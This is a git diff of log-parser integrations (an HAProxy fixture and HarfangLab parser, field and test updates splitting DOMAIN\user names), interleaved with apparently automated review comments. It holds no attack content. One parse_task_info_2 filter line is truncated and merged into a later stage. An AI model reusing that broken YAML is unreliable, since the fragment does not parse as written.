diff --git a/HAProxy/haproxy/tests/access4.json b/HAProxy/haproxy/tests/access4.json
new file mode 100644
index 000000000..89630f6bc
--- /dev/null
+++ b/HAProxy/haproxy/tests/access4.json
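Review bot: The trailing field is consumed by an unnamed `%{GREEDYDATA}`, so the value it carries — `aktci:"46.193.65.202"` in the new `tests/access4.json` fixture — is discarded rather than mapped, and that fixture's `related.ip` and `source` only hold the connecting address. If that field carries a client address, as the fixture suggests, a named capture such as `( aktci:"%{IP:aktci_ip}")?%{GREEDYDATA}` (field name constructed) would let a later stage surface it and the fixture could assert it. As written the bare `%{GREEDYDATA}` also accepts any trailing text, so unexpected future suffixes will match silently instead of showing up as parse failures; at minimum a comment on the pattern naming what it is meant to absorb (`# trailing "aktci:..." field added in 1.0.1`) would tell the next maintainer why it is there.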
@@ -0,0 +1,45 @@ +{ + "input": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "sekoiaio": { + "intake": { + "dialect": "HAProxy", + "dialect_uuid": "ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9" + } + } + }, + "expected": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "event": { + "kind": "access" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 1060, + "status_code": 200 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "90.83.225.109" + ] + }, + "source": { + "address": "90.83.225.109", + "ip": "90.83.225.109", + "port": 54761 + }, + "tls": { + "version": "1.2", + "version_protocol": "TLS" + }, + "url": { + "original": "/path/get/resource", + "path": "/path/get/resource" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/CHANGELOG.md b/HarfangLab/harfanglab/CHANGELOG.md index b51c03c58..020bfb34e 100644 --- a/HarfangLab/harfanglab/CHANGELOG.md +++ b/HarfangLab/harfanglab/CHANGELOG.md @@ -7,7 +7,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] -### 2024-10-01 +### 2024-12-11 - 1.3.0 + +### Changed + +- Split username into `user.name` and `user.domain` + +### 2024-10-01 - 1.2.0 ### Added diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index 611f3c079..1ad5ffb1e 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml 
@@ -953,6 +953,11 @@ action.properties.param9: name: action.properties.param9 type: keyword +harfanglab.agent_ids: + description: '' + name: harfanglab.agent_ids + type: keyword + harfanglab.aggregation_key: description: The key to the events aggregation name: harfanglab.aggregation_key @@ -1038,6 +1043,11 @@ harfanglab.threat_id: name: harfanglab.threat_id type: keyword +harfanglab.threat_key: + description: The key of the threat + name: harfanglab.threat_key + type: keyword + network.direction: description: The direction of the network connection name: network.direction diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 7ff16f6df..2b8fb9c96 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ' 0}}" network_info: actions: @@ -149,7 +171,16 @@ stages: process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} event.category: ["network"] event.type: ["connection"] 
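Review bot: `harfanglab.agent_ids` is added with `description: ''`, while every neighbouring entry — and the `harfanglab.threat_key` added in this file's second hunk — carries one, so the generated field documentation will show an empty line for it. Fill it in alongside the others, e.g. `description: Identifiers of the agents related to the event` (wording to confirm against the parser mapping that populates it, which is not in this diff).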
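Review bot: The new `user.name`/`user.domain` templates in the `-149` hunk only recognise the `DOMAIN\user` form: a value with no backslash is passed through whole, so a UPN-style `user@domain` (if HarfangLab emits it) stays unsplit, and `split('\\')[1]` keeps only the second segment when more than one backslash is present. When `username` is absent the `'\\' not in json_event.message.username` test runs against an undefined value, and `user.domain` renders as an empty string for plain usernames; whether that renders empty, raises, or sets `user.domain: ""` depends on the engine's undefined and empty-value handling, which this diff does not show, so confirm it with a fixture that has no backslash. The same ten-line block is pasted into the `process_info`, `alert_process_info`, `authentication_info` (source and target), `dns_info` and `auditlog_info` stages in the later hunks of this file; one shared form — e.g. `user.name: "{{ json_event.message.username.split('\\') | last }}"` with a `first`-based domain guarded by the same `in` test — or a single normalisation stage would keep the copies from drifting.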
@@ -170,7 +201,6 @@ stages:
 process.pe.company: "{{json_event.message.pe_info.company_name}}"
 process.pe.product: "{{json_event.message.pe_info.product_name}}"
 process.executable: "{{json_event.message.image_name}}"
- user.name: "{{json_event.message.username}}"
 process.parent.executable: "{{json_event.message.parent_image}}"
 process.parent.command_line: "{{json_event.message.parent_commandline}}"
 process.parent.name: '{{json_event.message.parent_image.split("\\") | last}}'
@@ -180,6 +210,17 @@ stages:
 harfanglab.grandparent.process.command_line: "{{json_event.message.parent_commandline}}"
 harfanglab.grandparent.process.ancestors: "{{json_event.message.ancestors.split('|')}}"
+ user.name: >
+ {%- if '\\' not in json_event.message.username -%}
+ {{ json_event.message.username }}
+ {%- else -%}
+ {{ json_event.message.username.split('\\')[1] }}
+ {%- endif -%}
+ user.domain: >
+ {%- if '\\' in json_event.message.username -%}
+ {{ json_event.message.username.split('\\')[0] }}
+ {%- endif -%}
+
 event.category: ["process"]
 event.type: ["start"]
 - set:
@@ -211,6 +252,7 @@ stages:
 alert_info:
 actions:
 - set:
+ event.kind: "alert"
 harfanglab.level: "{{json_event.message.level}}"
 rule.description: "{{json_event.message.msg}}"
 rule.name: "{{json_event.message.rule_name}}"
@@ -224,6 +266,7 @@ stages:
 harfanglab.aggregation_key: "{{json_event.message.aggregation_key}}"
 harfanglab.process.powershell.command: "{{json_event.message.details_powershell.PowershellCommand}}"
 harfanglab.process.powershell.script_path: "{{json_event.message.details_powershell.PowershellScriptPath}}"
+ harfanglab.threat_key: "{{json_event.message.threat_key}}"
 alert_process_info:
 actions:
@@ -238,7 +281,17 @@ stages:
 process.pe.product: "{{json_event.message.process.pe_info.product_name}}"
 process.executable: "{{json_event.message.process.image_name}}"
- user.name: "{{json_event.message.process.username}}"
+
+ user.name: >
+ {%- if '\\' not in json_event.message.process.username -%}
+ {{ json_event.message.process.username }}
+ {%- else -%}
+ {{ json_event.message.process.username.split('\\')[1] }}
+ {%- endif -%}
+ user.domain: >
+ {%- if '\\' in json_event.message.process.username -%}
+ {{ json_event.message.process.username.split('\\')[0] }}
+ {%- endif -%}
 process.parent.executable: "{{json_event.message.process.parent_image}}"
 process.parent.command_line: "{{json_event.message.process.parent_commandline}}"
@@ -277,8 +330,9 @@ stages:
 event.type: ["info"]
 event.provider: "{{json_event.message.source_name}}"
 event.code: "{{json_event.message.event_id|string}}"
- source.ip: "{{json_event.message.event_data.IpAddress}}"
 action.id: "{{json_event.message.event_id}}"
+
+ - set:
 user.name: "{{json_event.message.event_data.SubjectUserName}}"
 user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
 user.target.name: "{{json_event.message.event_data.TargetUserName}}"
@@ -474,6 +528,213 @@ stages: action.properties.param9: "{{json_event.message.event_data.get('param9')}}" action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}" action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}" + filter: "{{json_event.message.event_data != null}}" + + - set: + source.ip: "{{json_event.message.event_data.IpAddress}}" + filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}" + + - set: + user.name: "{{json_event.message.eventlog.event_data.SubjectUserName}}" + user.domain: "{{json_event.message.eventlog.event_data.SubjectDomainName}}" + user.target.name: "{{json_event.message.eventlog.event_data.TargetUserName}}" + user.target.domain: "{{json_event.message.eventlog.event_data.TargetDomainName}}" + action.properties.DeviceID: "{{json_event.message.eventlog.event_data.DeviceId}}" + action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.eventlog.event_data.get('AS security intelligence creation time')}}" + action.properties.ASsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('AS security intelligence version')}}" + action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.eventlog.event_data.get('AV security intelligence creation time')}}" + action.properties.AVsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('AV security intelligence version')}}" + action.properties.AccessList: "{{json_event.message.eventlog.event_data.get('AccessList')}}" + action.properties.AccessMask: "{{json_event.message.eventlog.event_data.get('AccessMask')}}" + action.properties.AccessReason: "{{json_event.message.eventlog.event_data.get('AccessReason')}}" + action.properties.ActionID: "{{json_event.message.eventlog.event_data.get('Action ID')}}" + action.properties.ActionName: "{{json_event.message.eventlog.event_data.get('Action Name')}}" + action.properties.AdditionalActionsID: 
"{{json_event.message.eventlog.event_data.get('Additional Actions ID')}}" + action.properties.AdditionalActionsString: "{{json_event.message.eventlog.event_data.get('Additional Actions String')}}" + action.properties.AuthenticationPackageName: "{{json_event.message.eventlog.event_data.get('AuthenticationPackageName')}}" + action.properties.BMstate: "{{json_event.message.eventlog.event_data.get('BM state')}}" + action.properties.CacheState: "{{json_event.message.eventlog.event_data.get('CacheState')}}" + action.properties.CallerProcessId: "{{json_event.message.eventlog.event_data.get('CallerProcessId')}}" + action.properties.CallerProcessName: "{{json_event.message.eventlog.event_data.get('CallerProcessName')}}" + action.properties.CategoryID: "{{json_event.message.eventlog.event_data.get('Category ID')}}" + action.properties.CategoryName: "{{json_event.message.eventlog.event_data.get('Category Name')}}" + action.properties.CertIssuerName: "{{json_event.message.eventlog.event_data.get('CertIssuerName')}}" + action.properties.CertSerialNumber: "{{json_event.message.eventlog.event_data.get('CertSerialNumber')}}" + action.properties.CertThumbprint: "{{json_event.message.eventlog.event_data.get('CertThumbprint')}}" + action.properties.ClientProcessId: "{{json_event.message.eventlog.event_data.get('ClientProcessId')}}" + action.properties.ClientProcessStartKey: "{{json_event.message.eventlog.event_data.get('ClientProcessStartKey')}}" + action.properties.DetectionID: "{{json_event.message.eventlog.event_data.get('Detection ID')}}" + action.properties.DetectionTime: "{{json_event.message.eventlog.event_data.get('Detection Time')}}" + action.properties.DetectionUser: "{{json_event.message.eventlog.event_data.get('Detection User')}}" + action.properties.Domain: "{{json_event.message.eventlog.event_data.get('Domain')}}" + action.properties.ElevatedToken: "{{json_event.message.eventlog.event_data.get('ElevatedToken')}}" + action.properties.EngineVersion: 
"{{json_event.message.eventlog.event_data.get('Engine Version')}}" + action.properties.Engineup-to-date: "{{json_event.message.eventlog.event_data.get('Engine up-to-date')}}" + action.properties.Engineversion: "{{json_event.message.eventlog.event_data.get('Engine version')}}" + action.properties.ErrorCode: "{{json_event.message.eventlog.event_data.get('Error Code')}}" + action.properties.ErrorDescription: "{{json_event.message.eventlog.event_data.get('Error Description')}}" + action.properties.ExecutionID: "{{json_event.message.eventlog.event_data.get('Execution ID')}}" + action.properties.ExecutionName: "{{json_event.message.eventlog.event_data.get('Execution Name')}}" + action.properties.FQDN: "{{json_event.message.eventlog.event_data.get('FQDN')}}" + action.properties.FWLink: "{{json_event.message.eventlog.event_data.get('FWLink')}}" + action.properties.FailureReason: "{{json_event.message.eventlog.event_data.get('FailureReason')}}" + action.properties.FileNameBuffer: "{{json_event.message.eventlog.event_data.get('FileNameBuffer')}}" + action.properties.FileNameLength: "{{json_event.message.eventlog.event_data.get('FileNameLength')}}" + action.properties.Flags: "{{json_event.message.eventlog.event_data.get('Flags')}}" + action.properties.Hash: "{{json_event.message.eventlog.event_data.get('Hash')}}" + action.properties.HashSize: "{{json_event.message.eventlog.event_data.get('Hash Size')}}" + action.properties.IOAVstate: "{{json_event.message.eventlog.event_data.get('IOAV state')}}" + action.properties.ImpersonationLevel: "{{json_event.message.eventlog.event_data.get('ImpersonationLevel')}}" + action.properties.IpAddress: "{{json_event.message.eventlog.event_data.get('IpAddress')}}" + action.properties.IpPort: "{{json_event.message.eventlog.event_data.get('IpPort')}}" + action.properties.IssuerName: "{{json_event.message.eventlog.event_data.get('IssuerName')}}" + action.properties.IssuerNameLength: 
"{{json_event.message.eventlog.event_data.get('IssuerNameLength')}}" + action.properties.IssuerTBSHash: "{{json_event.message.eventlog.event_data.get('IssuerTBSHash')}}" + action.properties.IssuerTBSHashSize: "{{json_event.message.eventlog.event_data.get('IssuerTBSHashSize')}}" + action.properties.KeyLength: "{{json_event.message.eventlog.event_data.get('KeyLength')}}" + action.properties.LastASsecurityintelligenceage: "{{json_event.message.eventlog.event_data.get('Last AS security intelligence age')}}" + action.properties.LastAVsecurityintelligenceage: "{{json_event.message.eventlog.event_data.get('Last AV security intelligence age')}}" + action.properties.Lastfullscanage: "{{json_event.message.eventlog.event_data.get('Last full scan age')}}" + action.properties.Lastfullscanendtime: "{{json_event.message.eventlog.event_data.get('Last full scan end time')}}" + action.properties.Lastfullscansource: "{{json_event.message.eventlog.event_data.get('Last full scan source')}}" + action.properties.Lastfullscanstarttime: "{{json_event.message.eventlog.event_data.get('Last full scan start time')}}" + action.properties.Lastquickscanage: "{{json_event.message.eventlog.event_data.get('Last quick scan age')}}" + action.properties.Lastquickscanendtime: "{{json_event.message.eventlog.event_data.get('Last quick scan end time')}}" + action.properties.Lastquickscansource: "{{json_event.message.eventlog.event_data.get('Last quick scan source')}}" + action.properties.Lastquickscanstarttime: "{{json_event.message.eventlog.event_data.get('Last quick scan start time')}}" + action.properties.Latestengineversion: "{{json_event.message.eventlog.event_data.get('Latest engine version')}}" + action.properties.Latestplatformversion: "{{json_event.message.eventlog.event_data.get('Latest platform version')}}" + action.properties.LmPackageName: "{{json_event.message.eventlog.event_data.get('LmPackageName')}}" + action.properties.LogonGuid: 
"{{json_event.message.eventlog.event_data.get('LogonGuid')}}" + action.properties.LogonProcessName: "{{json_event.message.eventlog.event_data.get('LogonProcessName')}}" + action.properties.LogonType: "{{json_event.message.eventlog.event_data.get('LogonType')}}" + action.properties.MemberName: "{{(json_event.message.eventlog.event_data.get('MemberName').split('\\\\')[-1]) or (parse_member_name_2.message.first_name + ' ' + parse_member_name_2.message.last_name)}}" + action.properties.CompatibleIds: "{{json_event.message.eventlog.event_data.get('CompatibleIds')}}" + action.properties.NRIengineversion: "{{json_event.message.eventlog.event_data.get('NRI engine version')}}" + action.properties.NRIsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('NRI security intelligence version')}}" + action.properties.NotValidAfter: "{{json_event.message.eventlog.event_data.get('NotValidAfter')}}" + action.properties.NotValidBefore: "{{json_event.message.eventlog.event_data.get('NotValidBefore')}}" + action.properties.OAstate: "{{json_event.message.eventlog.event_data.get('OA state')}}" + action.properties.ObjectType: "{{json_event.message.eventlog.event_data.get('ObjectType')}}" + action.properties.OriginID: "{{json_event.message.eventlog.event_data.get('Origin ID')}}" + action.properties.OriginName: "{{json_event.message.eventlog.event_data.get('Origin Name')}}" + action.properties.PageHash: "{{json_event.message.eventlog.event_data.get('PageHash')}}" + action.properties.ParentProcessId: "{{json_event.message.eventlog.event_data.get('ParentProcessId')}}" + action.properties.Path: "{{json_event.message.eventlog.event_data.get('Path')}}" + action.properties.Platformup-to-date: "{{json_event.message.eventlog.event_data.get('Platform up-to-date')}}" + action.properties.Platformversion: "{{json_event.message.eventlog.event_data.get('Platform version')}}" + action.properties.PolicyBits: "{{json_event.message.eventlog.event_data.get('PolicyBits')}}" + 
action.properties.PostCleanStatus: "{{json_event.message.eventlog.event_data.get('Post Clean Status')}}" + action.properties.PreAuthType: "{{json_event.message.eventlog.event_data.get('PreAuthType')}}" + action.properties.PreExecutionStatus: "{{json_event.message.eventlog.event_data.get('Pre Execution Status')}}" + action.properties.PrivilegeList: "{{json_event.message.eventlog.event_data.get('PrivilegeList')}}" + action.properties.ProcessId: "{{json_event.message.eventlog.event_data.get('ProcessId')}}" + action.properties.ProcessName: "{{json_event.message.eventlog.event_data.get('Process Name') or json_event.message.eventlog.event_data.get('ProcessName')}}" + action.properties.ProcessNameBuffer: "{{json_event.message.eventlog.event_data.get('ProcessNameBuffer')}}" + action.properties.ProcessNameLength: "{{json_event.message.eventlog.event_data.get('ProcessNameLength')}}" + action.properties.ProductName: "{{json_event.message.eventlog.event_data.get('Product Name')}}" + action.properties.ProductVersion: "{{json_event.message.eventlog.event_data.get('Product Version')}}" + action.properties.Productstatus: "{{json_event.message.eventlog.event_data.get('Product status')}}" + action.properties.ProfileChanged: "{{json_event.message.eventlog.event_data.get('ProfileChanged')}}" + action.properties.PublisherName: "{{json_event.message.eventlog.event_data.get('PublisherName')}}" + action.properties.PublisherNameLength: "{{json_event.message.eventlog.event_data.get('PublisherNameLength')}}" + action.properties.PublisherTBSHash: "{{json_event.message.eventlog.event_data.get('PublisherTBSHash')}}" + action.properties.PublisherTBSHashSize: "{{json_event.message.eventlog.event_data.get('PublisherTBSHashSize')}}" + action.properties.RTPstate: "{{json_event.message.eventlog.event_data.get('RTP state')}}" + action.properties.RelativeTargetName: "{{json_event.message.eventlog.event_data.get('RelativeTargetName')}}" + action.properties.RemediationUser: 
"{{json_event.message.eventlog.event_data.get('Remediation User')}}" + action.properties.RequestedPolicy: "{{json_event.message.eventlog.event_data.get('RequestedPolicy')}}" + action.properties.RequestedSigningLevel: "{{json_event.message.eventlog.event_data.get('RequestedSigningLevel')}}" + action.properties.RestrictedAdminMode: "{{json_event.message.eventlog.event_data.get('RestrictedAdminMode')}}" + action.properties.RpcCallClientLocality: "{{json_event.message.eventlog.event_data.get('RpcCallClientLocality')}}" + action.properties.RuleId: "{{json_event.message.eventlog.event_data.get('RuleId')}}" + action.properties.RuleName: "{{json_event.message.eventlog.event_data.get('RuleName')}}" + action.properties.ScriptBlockText: "{{json_event.message.eventlog.event_data.get('ScriptBlockText')}}" + action.properties.SecureRequired: "{{json_event.message.eventlog.event_data.get('SecureRequired')}}" + action.properties.SecurityintelligenceVersion: "{{json_event.message.eventlog.event_data.get('Security intelligence Version')}}" + action.properties.ServiceName: "{{json_event.message.eventlog.event_data.get('ServiceName')}}" + action.properties.ServiceSid: "{{json_event.message.eventlog.event_data.get('ServiceSid')}}" + action.properties.SeverityID: "{{json_event.message.eventlog.event_data.get('Severity ID')}}" + action.properties.SeverityName: "{{json_event.message.eventlog.event_data.get('Severity Name')}}" + action.properties.ShareLocalPath: "{{json_event.message.eventlog.event_data.get('ShareLocalPath')}}" + action.properties.ShareName: "{{json_event.message.eventlog.event_data.get('ShareName')}}" + action.properties.Signature: "{{json_event.message.eventlog.event_data.get('Signature')}}" + action.properties.SignatureType: "{{json_event.message.eventlog.event_data.get('SignatureType')}}" + action.properties.SourceID: "{{json_event.message.eventlog.event_data.get('Source ID')}}" + action.properties.SourceName: "{{json_event.message.eventlog.event_data.get('Source 
Name')}}" + action.properties.State: "{{json_event.message.eventlog.event_data.get('State')}}" + action.properties.Status: "{{json_event.message.eventlog.event_data.get('Status')}}" + action.properties.StatusCode: "{{json_event.message.eventlog.event_data.get('Status Code')}}" + action.properties.StatusDescription: "{{json_event.message.eventlog.event_data.get('Status Description')}}" + action.properties.SubStatus: "{{json_event.message.eventlog.event_data.get('SubStatus')}}" + action.properties.SubjectDomainName: "{{json_event.message.eventlog.event_data.get('SubjectDomainName')}}" + action.properties.SubjectLogonId: "{{json_event.message.eventlog.event_data.get('SubjectLogonId')}}" + action.properties.SubjectUserName: "{{json_event.message.eventlog.event_data.get('SubjectUserName')}}" + action.properties.SubjectUserSid: "{{json_event.message.eventlog.event_data.get('SubjectUserSid')}}" + action.properties.TargetDomainName: "{{json_event.message.eventlog.event_data.get('TargetDomainName')}}" + action.properties.TargetInfo: "{{json_event.message.eventlog.event_data.get('TargetInfo')}}" + action.properties.TargetLinkedLogonId: "{{json_event.message.eventlog.event_data.get('TargetLinkedLogonId')}}" + action.properties.TargetLogonGuid: "{{json_event.message.eventlog.event_data.get('TargetLogonGuid')}}" + action.properties.TargetLogonId: "{{json_event.message.eventlog.event_data.get('TargetLogonId')}}" + action.properties.TargetOutboundDomainName: "{{json_event.message.eventlog.event_data.get('TargetOutboundDomainName')}}" + action.properties.TargetOutboundUserName: "{{json_event.message.eventlog.event_data.get('TargetOutboundUserName')}}" + action.properties.TargetServerName: "{{json_event.message.eventlog.event_data.get('TargetServerName')}}" + action.properties.TargetSid: "{{json_event.message.eventlog.event_data.get('TargetSid')}}" + action.properties.TargetUserName: "{{json_event.message.eventlog.event_data.get('TargetUserName')}}" + 
action.properties.TargetUserSid: "{{json_event.message.eventlog.event_data.get('TargetUserSid')}}" + action.properties.TaskContent: "{{json_event.message.eventlog.event_data.get('TaskContent')}}" + action.properties.TaskName: "{{json_event.message.eventlog.event_data.get('TaskName')}}" + action.properties.ThreatID: "{{json_event.message.eventlog.event_data.get('Threat ID')}}" + action.properties.ThreatName: "{{json_event.message.eventlog.event_data.get('Threat Name')}}" + action.properties.TicketEncryptionType: "{{json_event.message.eventlog.event_data.get('TicketEncryptionType')}}" + action.properties.TicketOptions: "{{json_event.message.eventlog.event_data.get('TicketOptions')}}" + action.properties.TotalSignatureCount: "{{json_event.message.eventlog.event_data.get('TotalSignatureCount')}}" + action.properties.TransmittedServices: "{{json_event.message.eventlog.event_data.get('TransmittedServices')}}" + action.properties.TypeID: "{{json_event.message.eventlog.event_data.get('Type ID')}}" + action.properties.TypeName: "{{json_event.message.eventlog.event_data.get('Type Name')}}" + action.properties.Unused2: "{{json_event.message.eventlog.event_data.get('Unused2')}}" + action.properties.Unused3: "{{json_event.message.eventlog.event_data.get('Unused3')}}" + action.properties.Unused4: "{{json_event.message.eventlog.event_data.get('Unused4')}}" + action.properties.Unused5: "{{json_event.message.eventlog.event_data.get('Unused5')}}" + action.properties.Unused6: "{{json_event.message.eventlog.event_data.get('Unused6')}}" + action.properties.Unused: "{{json_event.message.eventlog.event_data.get('Unused')}}" + action.properties.User: "{{json_event.message.eventlog.event_data.get('User')}}" + action.properties.ValidatedPolicy: "{{json_event.message.eventlog.event_data.get('ValidatedPolicy')}}" + action.properties.ValidatedSigningLevel: "{{json_event.message.eventlog.event_data.get('ValidatedSigningLevel')}}" + action.properties.VerificationError: 
"{{json_event.message.eventlog.event_data.get('VerificationError')}}" + action.properties.VirtualAccount: "{{json_event.message.eventlog.event_data.get('VirtualAccount')}}" + action.properties.WorkstationName: "{{json_event.message.eventlog.event_data.get('WorkstationName')}}" + action.properties.ClassName: "{{json_event.message.eventlog.event_data.get('ClassName')}}" + action.properties.param0: "{{json_event.message.eventlog.event_data.get('param0')}}" + action.properties.param10: "{{json_event.message.eventlog.event_data.get('param10')}}" + action.properties.param11: "{{json_event.message.eventlog.event_data.get('param11')}}" + action.properties.param12: "{{json_event.message.eventlog.event_data.get('param12')}}" + action.properties.param13: "{{json_event.message.eventlog.event_data.get('param13')}}" + action.properties.param14: "{{json_event.message.eventlog.event_data.get('param14')}}" + action.properties.param15: "{{json_event.message.eventlog.event_data.get('param15')}}" + action.properties.param16: "{{json_event.message.eventlog.event_data.get('param16')}}" + action.properties.param17: "{{json_event.message.eventlog.event_data.get('param17')}}" + action.properties.param18: "{{json_event.message.eventlog.event_data.get('param18')}}" + action.properties.param19: "{{json_event.message.eventlog.event_data.get('param19')}}" + action.properties.param1: "{{json_event.message.eventlog.event_data.get('param1')}}" + action.properties.param20: "{{json_event.message.eventlog.event_data.get('param20')}}" + action.properties.param21: "{{json_event.message.eventlog.event_data.get('param21')}}" + action.properties.param22: "{{json_event.message.eventlog.event_data.get('param22')}}" + action.properties.param2: "{{json_event.message.eventlog.event_data.get('param2')}}" + action.properties.param3: "{{json_event.message.eventlog.event_data.get('param3')}}" + action.properties.param4: "{{json_event.message.eventlog.event_data.get('param4')}}" + action.properties.param5: 
"{{json_event.message.eventlog.event_data.get('param5')}}" + action.properties.param6: "{{json_event.message.eventlog.event_data.get('param6')}}" + action.properties.param7: "{{json_event.message.eventlog.event_data.get('param7')}}" + action.properties.param8: "{{json_event.message.eventlog.event_data.get('param8')}}" + action.properties.param9: "{{json_event.message.eventlog.event_data.get('param9')}}" + action.properties.TaskContentNew_Command: "{{parse_task_info_2.message.Task.Actions.Exec.Command}}" + action.properties.TaskContentNew_Args: "{{parse_task_info_2.message.Task.Actions.Exec.Arguments}}" + filter: "{{json_event.message.eventlog.event_data != null}}" + + - set: + source.ip: "{{json_event.message.eventlog.event_data.IpAddress}}" + filter: "{{json_event.message.eventlog.event_data.IpAddress | is_ipaddress}}" authentication_info: actions: @@ -495,9 +756,29 @@ stages: event.code: "{{json_event.message.windows.event_id}}" event.action: "{{json_event.message.object_type}}" user.id: "{{json_event.message.windows.source_sid}}" - user.name: "{{json_event.message.source_username}}" user.target.id: "{{json_event.message.windows.target_sid}}" - user.target.name: "{{json_event.message.target_username}}" + + user.name: > + {%- if '\\' not in json_event.message.source_username -%} + {{ json_event.message.source_username }} + {%- else -%} + {{ json_event.message.source_username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.source_username -%} + {{ json_event.message.source_username.split('\\')[0] }} + {%- endif -%} + + user.target.name: > + {%- if '\\' not in json_event.message.target_username -%} + {{ json_event.message.target_username }} + {%- else -%} + {{ json_event.message.target_username.split('\\')[1] }} + {%- endif -%} + user.target.domain: > + {%- if '\\' in json_event.message.target_username -%} + {{ json_event.message.target_username.split('\\')[0] }} + {%- endif -%} dns_info: actions: 
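Review bot: The roughly 190 `action.properties.*` assignments added in the `-474` hunk for `json_event.message.eventlog.event_data` duplicate, key for key, the existing block that reads `json_event.message.event_data`, with only the `filter` and the `parse_task_info_2` reference differing; two copies of a mapping this size will drift the first time a property is added to one of them. If the pipeline DSL allows it, resolving the event-data object once (whichever of the two paths is non-null) and keeping a single mapping would remove the duplication; failing that, a comment at the head of the new `set` such as `# mirrors the event_data block above — keep both property lists identical` is the minimum. Separately, `action.properties.MemberName` calls `.split('\\\\')` directly on the result of `.get('MemberName')`, which is null when the key is absent, and the `or` fallback to `parse_member_name_2` is only reached after that call, so confirm the engine tolerates a method call on null there; the definition of `parse_member_name_2` sits in an earlier hunk that is truncated in this view.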
@@ -506,10 +787,20 @@ stages:
event.type: ["info"] process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.process_image_path}}"
- user.name: "{{json_event.message.username}}"
dns.question.type: "{{json_event.message.query_type}}" dns.question.name: "{{json_event.message.requested_name}}"
+ user.name: >
+ {%- if '\\' not in json_event.message.username -%}
+ {{ json_event.message.username }}
+ {%- else -%}
+ {{ json_event.message.username.split('\\')[1] }}
+ {%- endif -%}
+ user.domain: >
+ {%- if '\\' in json_event.message.username -%}
+ {{ json_event.message.username.split('\\')[0] }}
+ {%- endif -%}
+
auditlog_info: actions: - set:
@@ -519,11 +810,21 @@ stages:
http.response.status_code: "{{json_event.message.response_status_code}}" url.path: "{{json_event.message.request_path}}" user_agent.original: "{{json_event.message.user_agent}}"
- user.name: "{{json_event.message.username}}"
source.ip: "{{json_event.message.ip_address}}" event.reason: "{{json_event.message.log_description}}" event.action: "{{json_event.message.log_slug}}"
+ user.name: >
+ {%- if '\\' not in json_event.message.username -%}
+ {{ json_event.message.username }}
+ {%- else -%}
+ {{ json_event.message.username.split('\\')[1] }}
+ {%- endif -%}
+ user.domain: >
+ {%- if '\\' in json_event.message.username -%}
+ {{ json_event.message.username.split('\\')[0] }}
+ {%- endif -%}
+
agentlog_info: actions: - set:
diff --git a/HarfangLab/harfanglab/tests/alert.json b/HarfangLab/harfanglab/tests/alert.json
index 0f8e1a0d4..6acde1285 100644
--- a/HarfangLab/harfanglab/tests/alert.json
+++ b/HarfangLab/harfanglab/tests/alert.json
@@ -76,7 +76,7 @@
"REDACTED" ], "user": [
- "REDACTED\\valves"
+ "valves"
] }, "rule": {
@@ -86,7 +86,8 @@
"name": "YARA binary check" }, "user": {
- "name": "REDACTED\\valves"
+ "domain": "REDACTED",
+ "name": "valves"
} } }
\ No newline at end of file
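Review bot: The `user.domain` block in the dns_info hunk renders to an empty string when `username` carries no backslash (the `{%-`/`-%}` markers strip all surrounding whitespace and the `if` has no `else`), so whether such an event ends up with no `user.domain` or with `user.domain: ""` depends on how the pipeline treats empty rendered values, and every fixture visible in this commit feeds a `DOMAIN\user` value through these stages. One fixture with a plain `username` (no domain prefix) asserting that `user.domain` is absent would pin that down, since detection rules keyed on `user.domain` behave differently for a missing field and an empty one. The same ten-line Jinja block is now pasted verbatim into the authentication_info, dns_info and auditlog_info stages; a one-line comment above each copy, e.g. `# split "DOMAIN\user" into user.domain / user.name (same block in authentication_info and auditlog_info)`, would make later fixes less likely to drift between copies.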
diff --git a/HarfangLab/harfanglab/tests/alert_1.json b/HarfangLab/harfanglab/tests/alert_1.json
index b69152813..484cfee47 100644
--- a/HarfangLab/harfanglab/tests/alert_1.json
+++ b/HarfangLab/harfanglab/tests/alert_1.json
@@ -35,7 +35,8 @@
"execution": 0, "groups": [], "level": "medium",
- "status": "new"
+ "status": "new",
+ "threat_key": "2971"
}, "host": { "domain": "EXAMPLE",
@@ -77,7 +78,7 @@
